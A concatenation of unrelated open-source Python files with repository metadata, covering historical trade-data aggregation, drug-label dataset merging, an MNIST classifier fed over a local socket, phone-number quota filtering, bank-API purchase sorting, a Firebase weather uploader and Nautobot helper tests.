- we exclude ports francs ("product_grouping" != "France")
- customs_direction = "La Rochelle" or "Bordeaux" or "Nantes" or "Bayonne" or "Montpellier"
- type = exports
- filtering eau-de-vie products : flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin"
# Aggregation/computation info
- eau-de-vie are classified as simple or double against [the following classification](https://docs.google.com/spreadsheets/d/e/2PACX-1vQI3rLZXqFtiqO4q8Pbp5uGH8fon-hYrd-LnJGtsYMe6UWWCwubvanKZY4FW1jI6eJ5OJ_GA8xUxYQf/pub?output=csv)
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("origines_exports_eau_de_vie_1789_la_rochelle/README.md", info)
write_csv("origines_exports_eau_de_vie_1789_la_rochelle/origines_exports_eau_de_vie_1789_la_rochelle.csv", origins_list)
logger.debug('done | compute_eau_de_vie_datasets')
with open('../data/toflit18_all_flows.csv', 'r') as f:
toflit18_flows = csv.DictReader(f)
# fill relevant flows
flows_1789_by_region = []
flows_1789_national = []
flows_national_all_years = []
flows_regional_all_years = []
flows_eau_de_vie = []
for flow in toflit18_flows:
# getting international exports of salt from La Rochelle
if flow['customs_region'] in ['La Rochelle', 'Bordeaux', 'Bayonne', 'Nantes', 'Montpellier'] and (flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin") and flow["best_guess_region_prodxpart"] == "1" and flow["partner_grouping"] != "France":
flows_eau_de_vie.append(flow)
# filtering out ports francs
if flow["year"] == "1789":
if flow["best_guess_region_prodxpart"] == "1" and flow["partner_grouping"] != "France":
flows_1789_by_region.append(flow)
if flow["best_guess_region_prodxpart"] == "1" and flow["partner_grouping"] != "France":
flows_regional_all_years.append(flow)
if flow["best_guess_national_partner"] == "1" and flow["partner_grouping"] != "France":
flows_national_all_years.append(flow)
compute_top_shared_toflit18_products(flows_1789_by_region)
compute_global_la_rochelle_evolution(flows_national_all_years, flows_regional_all_years)
compute_exports_colonial_products(flows_1789_by_region)
compute_eau_de_vie_datasets(flows_eau_de_vie) | medialab/portic-storymaps-2021 | datascripts/secondary_toflit18.py | secondary_toflit18.py | py | 25,597 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "lib.logger.info",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "lib.logger",
"line_number": 31,
"usage_type": "name"
},
{
"api_name": "operator.itemgetter",
"line_number": 146,
"usage_type": "call"
},
{
"api_name": "operator.itemgetter",... |
3458977723 | import pandas as pd
import numpy as np
from static.constants import FILE_PATH
def count_not_nan(row, columns):
return row[columns].count()
if __name__ == '__main__':
fda_app_num_df = pd.DataFrame(columns=['ID'])
full_info_df = pd.DataFrame(columns=['ID'])
# Orange Book
ob_raw_df = pd.read_csv(FILE_PATH.ORANGE_BOOK_ORIGIN, delimiter='~', dtype=str)
print('OrangeBook Initial: ' + str(len(ob_raw_df)))
ob_raw_df['Full_Appl_No'] = np.where(ob_raw_df.Appl_Type == 'N', 'NDA' + ob_raw_df.Appl_No, 'ANDA' + ob_raw_df.Appl_No)
ob_raw_df = ob_raw_df.sort_values(['Full_Appl_No'], ascending=True).reset_index(drop=True)
ob_unique_df = ob_raw_df.drop_duplicates(subset=['Full_Appl_No'], keep='first')
ob_unique_df = ob_unique_df[['Full_Appl_No']].copy()
ob_unique_df['ID'] = ob_unique_df['Full_Appl_No']
ob_unique_df = ob_unique_df.rename(columns={'Full_Appl_No': 'ob_FDA_Application_Number'})
print('OrangeBook Filtered: ' + str(len(ob_unique_df)))
full_info_df = ob_unique_df[['ID']].copy()
full_info_df = pd.merge(full_info_df, ob_unique_df, how='left', on='ID')
# DailyMed
dm_origin_df = pd.read_csv(FILE_PATH.DAILYMED_ORIGIN, delimiter='|')
print('DailyMed Initial: ' + str(len(dm_origin_df)))
dm_accessible_df = pd.read_csv(FILE_PATH.DAILYMED_RAW)
print('DailyMed Accessible: ' + str(len(dm_accessible_df)))
dm_remap_df = pd.read_csv(FILE_PATH.DAILYMED_REMAP)
print('DailyMed Remap: ' + str(len(dm_remap_df)))
dm_df = pd.read_csv(FILE_PATH.DAILYMED_PREPROCESS)
print('DailyMed Preprocess: ' + str(len(dm_df)))
dm_df = dm_df.add_prefix('dm_')
dm_df['ID'] = dm_df['dm_FDA_Application_Number']
full_info_df = pd.merge(full_info_df, dm_df, how='left', on='ID')
# DrugBank
db_remap_df = pd.read_csv(FILE_PATH.DRUGBANK_REMAP)
print('DrugBank Remap: ' + str(len(db_remap_df)))
db_df = pd.read_csv(FILE_PATH.DRUGBANK_PREPROCESS)
print('DrugBank Preprocess: ' + str(len(db_df)))
db_df = db_df.add_prefix('db_')
db_df['ID'] = db_df['db_FDA_Application_Number']
full_info_df = pd.merge(full_info_df, db_df, how='left', on='ID')
# Drugs@FDA
drugs_fda_initial_df = pd.read_csv(FILE_PATH.DRUGSFDA_ORIGIN_DOCS, encoding="ISO-8859-1", delimiter='\t', dtype=str)
drugs_fda_initial_df = drugs_fda_initial_df[drugs_fda_initial_df.ApplicationDocsTypeID == '2']
print('Drugs@FDA Initial: ' + str(len(drugs_fda_initial_df)))
drugs_fda_accessible_df = pd.read_csv(FILE_PATH.DRUGSFDA_RAW)
print('Drugs@FDA Accessible: ' + str(len(drugs_fda_accessible_df)))
df_df = pd.read_csv(FILE_PATH.DRUGSFDA_PREPROCESS)
print('Drugs@FDA Preprocess: ' + str(len(df_df)))
df_df = df_df.add_prefix('df_')
df_df['ID'] = df_df['df_full_appl_no']
df_df = df_df.rename(columns={'df_full_appl_no': 'df_FDA_Application_Number'})
full_info_df = pd.merge(full_info_df, df_df, how='left', on='ID')
full_info_df['drug_count'] = full_info_df.apply(
lambda x: x[['dm_FDA_Application_Number', 'db_FDA_Application_Number', 'df_FDA_Application_Number']].count(), axis=1)
full_info_df['box_warning_count'] = full_info_df.apply(
lambda x: x[['dm_Box_Warning', 'df_Box_Warning']].count(), axis=1)
full_info_df['indication_count'] = full_info_df.apply(
lambda x: x[['dm_Indication', 'db_Indication', 'df_Indication']].count(), axis=1)
full_info_df['dosage_admin_count'] = full_info_df.apply(
lambda x: x[['dm_Dosage_Administration', 'df_Dosage_Administration']].count(), axis=1)
full_info_df['pregnancy_count'] = full_info_df.apply(
lambda x: x[['dm_Pregnancy', 'df_Pregnancy']].count(), axis=1)
full_info_df['lactation_count'] = full_info_df.apply(
lambda x: x[['dm_Lactation', 'df_Lactation']].count(), axis=1)
full_info_df['mechanism_of_action_count'] = full_info_df.apply(
lambda x: x[['dm_Mechanism_of_Action', 'db_Mechanism_of_Action', 'df_Mechanism_of_Action']].count(), axis=1)
full_info_df['pharmacodynamics_count'] = full_info_df.apply(
lambda x: x[['dm_Pharmacodynamics', 'db_Pharmacodynamics', 'df_Pharmacodynamics']].count(), axis=1)
full_info_df['information_for_patients_count'] = full_info_df.apply(
lambda x: x[['dm_Information_for_Patients', 'df_Information_for_Patients']].count(), axis=1)
full_info_df['absorption_count'] = full_info_df.apply(
lambda x: x[['dm_Absorption', 'db_Absorption', 'df_Absorption']].count(), axis=1)
full_info_df['distribution_count'] = full_info_df.apply(
lambda x: x[['dm_Distribution', 'db_Volume_of_Distribution', 'df_Distribution']].count(), axis=1)
full_info_df['metabolism_count'] = full_info_df.apply(
lambda x: x[['dm_Metabolism', 'db_Metabolism', 'df_Metabolism']].count(), axis=1)
full_info_df['excretion_count'] = full_info_df.apply(
lambda x: x[['dm_Excretion', 'db_Route_of_Elimination', 'df_Excretion']].count(), axis=1)
full_info_df['food_effect_count'] = full_info_df.apply(
lambda x: x[['dm_Food_Effect', 'df_Food_Effect']].count(), axis=1)
print('full_info_df: ' + str(len(full_info_df)))
full_info_df.to_csv('full_info_df.csv', index=False)
| Yiwen-Shi/drug-labeling-extraction | multi_data_source_combine.py | multi_data_source_combine.py | py | 5,224 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "static.constants.FI... |
20070281870 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A very simple MNIST classifier.
See extensive documentation at
http://tensorflow.org/tutorials/mnist/beginners/index.md
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# Import data
from tensorflow.examples.tutorials.mnist import input_data
from array import array
import tensorflow as tf
import numpy as np
# preprocess need:
import os
import socket
from PIL import Image
#from array import *
from random import shuffle
#gzip (windows can use)
import gzip
import shutil
from random import randrange
imgName = 0
# Load from and save to
Names = [['D:\\test-images\\','test'], ['D:\\test-images\\','test']]
isRecv=False
tensorflow_img_recognize="tensorflowimg##"
prefix_tensorflow_prediction="tensorflowPrediction#"
recognize_false="false#"
recognize_true="true#"
# preprocess functions
def resizeImage(DATA_DIR):
# Names = [['training-images\\','train'], ['test-images\\','test']]
#DATA_DIR = "D:\\myimg2\\"
file_data = []
for filename in os.listdir(DATA_DIR):
print('Loading: %s' % filename)
im = Image.open(DATA_DIR+filename).convert('L') # to Gray scale
print (im.size)
width = 28
ratio = float(width)/im.size[0]
height = 28
nim = im.resize( (width, height), Image.BILINEAR )
print (nim.size)
nim.save(DATA_DIR+filename)
def convertImageToMnistFormat():
for name in Names:
data_image = array('B')
data_label = array('B')
FileList = []
for dirname in os.listdir(name[0])[0:]: # [1:] Excludes .DS_Store from Mac OS
print('dirname:'+dirname)
path = os.path.join(name[0],dirname)
for filename in os.listdir(path):
if filename.endswith(".png"):
FileList.append(os.path.join(name[0],dirname,filename))
if filename.endswith(".jpg"):
FileList.append(os.path.join(name[0],dirname,filename))
shuffle(FileList) # Usefull for further segmenting the validation set
for filename in FileList:
## print (filename)
label = int(filename.split('\\')[2])
Im = Image.open(filename)
print (filename)
pixel = Im.load()
width, height = Im.size
## print (width)
## print (height)
x=0
y=0
for x in range(0,width):
for y in range(0,height):
data_image.append(pixel[y,x])
data_label.append(label) # labels start (one unsigned byte each)
hexval = "{0:#0{1}x}".format(len(FileList),6) # number of files in HEX
# header for label array
header = array('B')
header.extend([0,0,8,1,0,0])
header.append(int('0x'+hexval[2:][:2],16))
header.append(int('0x'+hexval[2:][2:],16))
data_label = header + data_label
# additional header for images array
if max([width,height]) <= 256:
header.extend([0,0,0,width,0,0,0,height])
else:
raise ValueError('Image exceeds maximum size: 256x256 pixels');
header[3] = 3 # Changing MSB for image data (0x00000803)
data_image = header + data_image
output_file = open(name[1]+'-images-idx3-ubyte', 'wb')
data_image.tofile(output_file)
print (name[1]+'-images-idx3-ubyte' + 'success!')
output_file.close()
output_file = open(name[1]+'-labels-idx1-ubyte', 'wb')
data_label.tofile(output_file)
print (name[1]+'-labels-idx1-ubyte' + 'success!')
output_file.close()
##
def recvImage(DATA_DIR):
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 17784 # Reserve a port for your service.
s.connect(("127.0.0.1", port))
## s.send("imgte") only work on python 2.7
s.send(tensorflow_img_recognize.encode('utf-8')) # recv site also need to decode
global isRecv
while (not isRecv) :
print(isRecv)
cmd = s.recv(33)
strCmd = str(cmd.strip().decode('utf-8'))
print('daemon said: '+ strCmd)
if strCmd.find('readyTheFileBuffer')!=-1:
s.send((tensorflow_img_recognize+'fileBufferIsReady').encode('utf-8'))
# start recv file
global imgName
imgName = randrange(9999999) # random a img file name
with open(DATA_DIR+str(imgName)+'.jpg', 'wb') as f:
print ('file opened')
## data = s.recv(1024)
## f.write(991)
## print(len(data))
## print(len(cmd))
## data = ""
while True:
print('receiving data...')
data = s.recv(1024)
#print('data=%s', (data))
if not data:
break
# write data to a file
f.write(data)
f.close()
print('Successfully get the file')
s.close()
print('connection closed')
# why didn't need global keyword?
# global isRecv
isRecv=True
while True:
recvImage("D:\\test-images\\0\\")
##try :
## recvImage("D:\\test-images\\0\\")
##except:
## print ("exception")
if isRecv:
resizeImage("D:\\test-images\\0\\")
## resizeImage("D:\\training-images\\1\\")
## resizeImage("D:\\training-images\\2\\")
## resizeImage("D:\\training-images\\3\\")
## resizeImage("D:\\training-images\\4\\")
## resizeImage("D:\\training-images\\5\\")
convertImageToMnistFormat()
for name in Names:
with open(name[1]+'-images-idx3-ubyte', 'rb') as f_in, gzip.open('D:\\tmp\data\q'+name[1]+'-images.gz', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
with open(name[1]+'-labels-idx1-ubyte', 'rb') as f_in, gzip.open('D:\\tmp\data\q'+name[1]+'-labels.gz', 'wb') as f_out:
shutil.copyfileobj(f_in, f_out)
flags = tf.app.flags
FLAGS = flags.FLAGS
# flags.DEFINE_string('data_dir', '/tmp/data/', 'Directory for storing data')
mnist = input_data.read_data_sets("D:\\tmp\\data\\", one_hot=True)
sess = tf.InteractiveSession()
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
W = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.nn.softmax(tf.matmul(x, W) + b)
# Define loss and optimizer
y_ = tf.placeholder(tf.float32, [None, 10])
cross_entropy = tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(y), reduction_indices=[1]))
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
# Train
tf.initialize_all_variables().run()
for i in range(1000):
batch_xs, batch_ys = mnist.train.next_batch(100)
train_step.run({x: batch_xs, y_: batch_ys})
if i%100==0:
## # Test trained model
## correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
## accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
## print(accuracy.eval({x: mnist.test.images, y_: mnist.test.labels}))
# prediction label(program think what it is)
prediction=tf.argmax(y,1)
print(prediction.eval(feed_dict={x: mnist.test.images}))
myPrediction = str(prediction.eval(feed_dict={x: mnist.test.images}))
## # probility of the prediction
## probabilities=y
## print("probabilities", probabilities.eval(feed_dict={x: mnist.test.images}, session=sess))
## for i in range(1):
## # ground truth
## print(np.argmax(mnist.test.labels[i, :]))
##
s = socket.socket() # Create a socket object
host = socket.gethostname() # Get local machine name
port = 17784 # Reserve a port for your service.
s.connect(("127.0.0.1", port))
## s.send("imgte") only work on python 2.7
# example: tensorflowimg##tensorflowPrediction#[5]
s.send((tensorflow_img_recognize+prefix_tensorflow_prediction+myPrediction).encode('utf-8')) # recv site also need to decode
while True :
cmd = s.recv(1024)
strCmd = str(cmd.strip().decode('utf-8'))
print(strCmd)
directoryNameStartInedx = len(prefix_tensorflow_prediction)+len(recognize_false)
original_img_path = 'D:\\test-images\\0'
training_false_img_path = 'D:\\training-images\\'+strCmd[directoryNameStartInedx:len(strCmd)]
training_true_img_path = 'D:\\training-images\\'+myPrediction[1:2]
print('directoryNameStartInedx:'+str(directoryNameStartInedx))
print('train_false_path:'+training_false_img_path)
print('train_true_path:'+training_true_img_path)
if strCmd.find('false')!=-1:
if not os.path.exists(training_false_img_path):
os.makedirs(training_false_img_path)
os.rename(original_img_path+'\\'+str(imgName)+'.jpg',training_false_img_path+'\\'+str(imgName)+'.jpg')
s.send((tensorflow_img_recognize+'saveToDbSuccessful').encode('utf-8'))
print('SaveToDbSuccessful')
isRecv=False
s.close()
print('connection closed')
break;
elif strCmd.find('true')!=-1:
print(myPrediction)
os.rename(original_img_path+'\\'+str(imgName)+'.jpg',training_true_img_path+'\\'+str(imgName)+'.jpg')
s.send((tensorflow_img_recognize+'saveToDbSuccessful').encode('utf-8'))
print('SaveToDbSuccessful')
isRecv=False
s.close()
print('connection closed')
break;
| SarahYuHanCheng/Eblockly | Tensorflow/mnist_softmax.py | mnist_softmax.py | py | 11,159 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.listdir",
"line_number": 58,
"usage_type": "call"
},
{
"api_name": "PIL.Image.open",
"line_number": 60,
"usage_type": "call"
},
{
"api_name": "PIL.Image",
"line_number": 60,
"usage_type": "name"
},
{
"api_name": "PIL.Image.BILINEAR",
"line_nu... |
38227461693 | import json
from typing import Tuple
import pandas as pd
from pandas import DataFrame
class QuotasFilter:
def filter_phone_numbers(self, phone_numbers: DataFrame, quotas: dict) -> Tuple[DataFrame, DataFrame]:
rows_with_quotas = []
rows_with_errors = []
for _, row in phone_numbers.iterrows():
new_row = dict(row)
region_quotas = quotas[row["RegionName"]]
try:
row_with_quotas = self.make_new_row_with_quota(new_row, region_quotas)
rows_with_quotas.append(row_with_quotas)
except KeyError as e:
row_json = dict(row)
row_json["reason"] = f"Нe найдена квота '{e}'"
rows_with_errors.append(row_json)
return pd.DataFrame(rows_with_quotas), pd.DataFrame(rows_with_errors)
def filter_reminders(self, phone_numbers: DataFrame, quotas: dict) -> Tuple[DataFrame, DataFrame]:
rows_with_quotas = []
rows_with_errors = []
for _, row in phone_numbers.iterrows():
new_row = dict(row)
if pd.isna(row["Group"]):
continue
new_row["Пол"], new_row["Возраст"] = self.get_age_and_gender_from_reminder(new_row)
region_name = row["RegionName"]
# 'Хабаровский край' is the only region name that differs between 'край' and 'Край' in different sources.
# We have to make this condition to keep regions consistent according to our internal standard.
region_quotas = {}
if region_name == "Хабаровский край":
region_quotas = quotas["Хабаровский Край"]
else:
region_quotas = quotas[region_name]
try:
row_with_quotas = self.make_new_row_with_quota(new_row, region_quotas)
rows_with_quotas.append(row_with_quotas)
except KeyError as e:
row_json = dict(row)
row_json["reason"] = f"Нe найдена квота '{e}'"
rows_with_errors.append(row_json)
return pd.DataFrame(rows_with_quotas), pd.DataFrame(rows_with_errors)
def make_new_row_with_quota(self, new_row: dict, region_quotas: dict) -> dict:
region_quota = region_quotas["Весь регион"]
if region_quota["balance"] <= 0:
new_row["IsCallable"] = False
new_row["Quota"] = f'"Весь регион": {json.dumps(region_quota, ensure_ascii=False)}'
return new_row
matching_quotas = dict()
matching_quotas["Весь регион"] = region_quotas["Весь регион"]
for quota_name in region_quotas:
quota = region_quotas[quota_name]
if self.is_group_quota_match(new_row, quota):
matching_quotas[quota_name] = quota
operator = new_row["OperatorName"]
matching_quotas[operator] = region_quotas[operator]
if all(
matching_quotas[quota_name]["balance"] == "" or matching_quotas[quota_name]["balance"] > 0
for quota_name in matching_quotas
):
new_row["IsCallable"] = True
new_row["Quota"] = f"{json.dumps(matching_quotas, ensure_ascii=False)}"
else:
new_row["IsCallable"] = False
new_row["Quota"] = f"{json.dumps(matching_quotas, ensure_ascii=False)}"
return new_row
@staticmethod
def is_group_quota_match(new_row: dict, quota: dict) -> bool:
if (
new_row["Пол"] == quota["gender"]
or quota["gender"] == ""
and isinstance(quota["age_from"], int)
and isinstance(quota["age_to"], int)
) and quota["age_from"] <= new_row["Возраст"] <= quota["age_to"]:
return True
return False
@staticmethod
def is_quota_balance_zero(quota: dict) -> bool:
if quota["balance"] == 0:
return True
return False
def get_age_and_gender_from_reminder(self, row: dict) -> Tuple[str, str]:
# "513_23_Тюменская область_Мегафон_Ж3645" --> ("Ж", "36")
group = row["Group"][-5:] # Ж3645
age = int(group[1:3])
gender = group[:1]
if gender == "М":
gender = "Мужской"
elif gender == "Ж":
gender = "Женский"
else:
raise ValueError("Gender is neither М nor Ж")
return gender, age
| tenetko/phone-numbers-beautifier | backend/src/core/quotas_filter/quotas_filter.py | quotas_filter.py | py | 4,558 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.DataFrame",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "pandas.DataFrame",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "typing.Tuple",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "pandas.DataFrame",
"... |
38819057412 | ## To call this stuff. First call the getAllPurchases which makes a request and sorts it. Then call the get*Food*() to get the food purchases
import requests
import json
import time, sys
customerId = '56c66be5a73e4927415073da'
apiKey = '52da742eb132c5000831254a4002207a'
# define global vars
foodPurchases = []
retailPurchases = []
onlinePurchases = []
# This is called by getAllPurchase(). No need to call this
def sortAllPurchases(allPurchases):
# First get all the categories we have
possibleCategories = []
for purchase in allPurchases:
possibleCategories.append(purchase['description'])
possibleCategories = list(set(possibleCategories))
# Create mapping to categories "food", "online", or "retail"
subcategoryMappingToCategory = {"fastFood":"food", \
"fineDining":"food", \
"apparelOnline":"online", \
"electronicsOnline":"online", \
"generalMerchandiseOnline":"online", \
"homeGoodsOnline":"online", \
"sportingGoodsOnline":"online", \
"hardware":"retail", \
"apparel":"retail"}
# Go through all purchases and sort them into the purchases global array variables
for purchase in allPurchases:
if purchase['description'] not in subcategoryMappingToCategory.keys():
# print "ERROR cannot sort %s into a category. may need to add the subcategory mapping" % purchase['description']
# print purchase
continue
if (subcategoryMappingToCategory[purchase['description']] is "food"):
global foodPurchases
foodPurchases.append(purchase)
elif (subcategoryMappingToCategory[purchase['description']] is "online"):
global onlinePurchases
onlinePurchases.append(purchase)
elif (subcategoryMappingToCategory[purchase['description']] is "retail"):
global retailPurchases
retailPurchases.append(purchase)
def getAllPurchase():
# first clear all global vars
global foodPurchases, retailPurchases, onlinePurchases
foodPurchases = []
retailPurchases = []
onlinePurchases = []
accountsUrl = 'http://api.reimaginebanking.com/customers/{}/accounts?key={}'.format(customerId, apiKey)
response = requests.get(accountsUrl)
accounts = response.json()
id = ""
for account in accounts:
if(account['type'] == 'Credit Card'):
id = account['_id']
break
urlToScrape = 'http://api.reimaginebanking.com/accounts/{}/purchases?key={}'.format(id,apiKey)
response = requests.get(urlToScrape)
retList = []
if response.status_code == 200:
conv = response.json()
for ii, con in enumerate(conv):
url = 'http://api.reimaginebanking.com/merchants/{}?key={}'.format(con['merchant_id'],apiKey)
response = requests.get(url)
name = response.json()['name'].replace("\x00", "")
retList.append({"id" : con['merchant_id'], "description" : con['description'],
"name": name, "date":con['purchase_date'],
"price":con['amount'] })
sortAllPurchases(retList)
return json.dumps(retList)
def getNamesAndGIS():
accountsUrl = 'http://api.reimaginebanking.com/customers/{}/accounts?key={}'.format(customerId, apiKey)
response = requests.get(accountsUrl)
accounts = response.json()
id = ""
for account in accounts:
if(account['type'] == 'Credit Card'):
id = account['_id']
break
# Get all purchases
purchasesUrl = 'http://api.reimaginebanking.com/accounts/{}/purchases?key={}'.format(id,apiKey)
# Creates a purchase
response = requests.get(purchasesUrl)
# Get the merchant ids we need
merchantIds = []
for merch in response.json():
merchantIds.append(merch['merchant_id'])
# Get all merchants up in the cloud to compare to
url = 'http://api.reimaginebanking.com/merchants?key={}'.format(apiKey)
response = requests.get(url)
allMerchants = response.json()
#filter the allMerchants to just the ones we want
newAllMerchants = []
for merch in allMerchants:
if merch['_id'] in merchantIds:
newAllMerchants.append(merch)
allMerchants = newAllMerchants
# filter out the ones that do not have the geotags
geotagsAndMerchants = {}
for merch in allMerchants:
if 'geocode' in merch:
geotagsAndMerchants[merch['name']] = [str(merch['geocode']['lat']), str(merch['geocode']['lng'])]
# Return a map of {name: [lat, long]}
return json.dumps(geotagsAndMerchants)
# getters for json data
def getFood():
getAllPurchase()
return json.dumps(foodPurchases)
def getRetail():
getAllPurchase()
return json.dumps(retailPurchases)
def getOnline():
getAllPurchase()
return json.dumps(onlinePurchases)
# TEST The stuff from the stats.json file
# with open('cache/stats.json') as data_file:
# allData = json.load(data_file)
# sortAllPurchases(allData)
# print getFood()
| jpurviance/Flex | C1Parser.py | C1Parser.py | py | 5,275 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "requests.get",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "requests.get",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number"... |
38026142247 | from firebase import firebase
import csv
linc = 'https://homerealtime-2be60.firebaseio.com'
def post_data(linc, m,d,t, dat):
firebas = firebase.FirebaseApplication(linc, None)
firebas.post(("%s/Weather/2018/%s/%s/%s"%(linc,m,d,t)), dat)
print("Posted data in %s/%s/%s" % (m,d,t))
month = ['January', 'February', 'March', 'April', 'May', 'June', 'July', 'August', 'September', 'October', 'November', 'December']
newFile = []
times_missed = 0
monCount = 4
dayCount = 0
for y in range(0,12):
for z in range(1, 30):
link1 = 'D:\\FYP\\Weather_Data\\2018\\' + str(monCount + 1) + '\\' + str(z) + ' ' + month[
monCount] + ' 2018.csv'
with open(link1) as f:
a = [{k: v for k, v in row.items()}
for row in csv.DictReader(f, skipinitialspace=True)]
a.pop(0)
for i in range(0, len(a)):
tt = a[i]['Time']
tp = a[i]['Temp']
tp = tp.replace("°C", "")
ww = a[i]['Weather']
ww = ww.replace(".", "")
if "Rain" in ww or "rain" in ww:
ww = "Rain"
elif "Thunder" in ww:
ww = "Thunderstorms"
elif "cloud" in ww or "Cloud" in ww:
ww = "Clouds"
wi = a[i]['Wind']
wi = wi.replace(" km/h", "")
if "No wind" in wi or wi == "N/A":
wi = 0
bb = a[i]['Barometer']
bb = bb.replace("%", "")
if bb == "N/A":
bb = 65
vv = a[i]['Visibility']
vv = vv.replace(" mbar", "")
if vv == "N/A":
vv = 1006
d = {'Temp': tp, 'Weather': ww, 'Wind': wi, 'Barometer': bb,
'Visibility': vv}
#newFile.append(d)
post_data(linc,monCount+1,z,tt,d)
dayCount = dayCount + 1
monCount = monCount + 1
| MishaalSafeer/home-algo | uploadFire.py | uploadFire.py | py | 1,971 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "firebase.firebase.FirebaseApplication",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "firebase.firebase",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "csv.DictReader",
"line_number": 27,
"usage_type": "call"
}
] |
21131537908 | """Unit tests for nautobot_golden_config utilities helpers."""
import logging
from unittest.mock import MagicMock, patch
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
from django.template import engines
from jinja2 import exceptions as jinja_errors
from nautobot.dcim.models import Device, Platform, Location, LocationType
from nautobot.extras.models import DynamicGroup, GitRepository, GraphQLQuery, Status, Tag
from nornir_nautobot.exceptions import NornirNautobotException
from nautobot_golden_config.models import GoldenConfigSetting
from nautobot_golden_config.tests.conftest import create_device, create_helper_repo, create_orphan_device
from nautobot_golden_config.utilities.helper import (
get_device_to_settings_map,
get_job_filter,
null_to_empty,
render_jinja_template,
)
class HelpersTest(TestCase): # pylint: disable=too-many-instance-attributes
"""Test Helper Functions."""
def setUp(self):
"""Setup a reusable mock object to pass into GitRepo."""
self.repository_obj = MagicMock()
self.repository_obj.path = "/fake/path"
GitRepository.objects.all().delete()
create_helper_repo(name="backup-parent_region-1", provides="backupconfigs")
create_helper_repo(name="intended-parent_region-1", provides="intendedconfigs")
create_helper_repo(name="test-jinja-repo", provides="jinjatemplate")
create_helper_repo(name="backup-parent_region-2", provides="backupconfigs")
create_helper_repo(name="intended-parent_region-2", provides="intendedconfigs")
create_helper_repo(name="test-jinja-repo-2", provides="jinjatemplate")
create_helper_repo(name="backup-parent_region-3", provides="backupconfigs")
create_helper_repo(name="intended-parent_region-3", provides="intendedconfigs")
create_helper_repo(name="test-jinja-repo-3", provides="jinjatemplate")
# Since we enforce a singleton pattern on this model, nuke the auto-created object.
GoldenConfigSetting.objects.all().delete()
self.content_type = ContentType.objects.get(app_label="dcim", model="device")
dynamic_group1 = DynamicGroup.objects.create(
name="test1 location site-4",
content_type=self.content_type,
filter={"location": ["Site 4"]},
)
dynamic_group2 = DynamicGroup.objects.create(
name="test2 location site-4",
content_type=self.content_type,
filter={"location": ["Site 4"]},
)
dynamic_group3 = DynamicGroup.objects.create(
name="test3 location site-all",
content_type=self.content_type,
filter={},
)
graphql_query = GraphQLQuery.objects.create(
name="testing",
query="""
query ($device_id: ID!) {
device(id: $device_id){
name
}
}
""",
)
self.test_settings_a = GoldenConfigSetting.objects.create(
name="test_a",
slug="test_a",
description="test_a",
weight=1000,
backup_repository=GitRepository.objects.get(name="backup-parent_region-1"),
intended_repository=GitRepository.objects.get(name="intended-parent_region-1"),
jinja_repository=GitRepository.objects.get(name="test-jinja-repo"),
# Limit scope to orphaned device only
dynamic_group=dynamic_group1,
sot_agg_query=graphql_query,
)
self.test_settings_b = GoldenConfigSetting.objects.create(
name="test_b",
slug="test_b",
description="test_b",
weight=2000,
backup_repository=GitRepository.objects.get(name="backup-parent_region-2"),
intended_repository=GitRepository.objects.get(name="intended-parent_region-2"),
jinja_repository=GitRepository.objects.get(name="test-jinja-repo-2"),
# Limit scope to orphaned device only
dynamic_group=dynamic_group2,
sot_agg_query=graphql_query,
)
self.test_settings_c = GoldenConfigSetting.objects.create(
name="test_c",
slug="test_c",
description="test_c",
weight=1000,
backup_repository=GitRepository.objects.get(name="backup-parent_region-3"),
intended_repository=GitRepository.objects.get(name="intended-parent_region-3"),
jinja_repository=GitRepository.objects.get(name="test-jinja-repo-3"),
dynamic_group=dynamic_group3,
sot_agg_query=graphql_query,
)
create_device(name="test_device")
create_orphan_device(name="orphan_device")
self.job_result = MagicMock()
self.data = MagicMock()
self.logger = logging.getLogger(__name__)
self.device_to_settings_map = get_device_to_settings_map(queryset=Device.objects.all())
def test_null_to_empty_null(self):
"""Ensure None returns with empty string."""
result = null_to_empty(None)
self.assertEqual(result, "")
def test_null_to_empty_val(self):
"""Ensure if not None input is returned."""
result = null_to_empty("test")
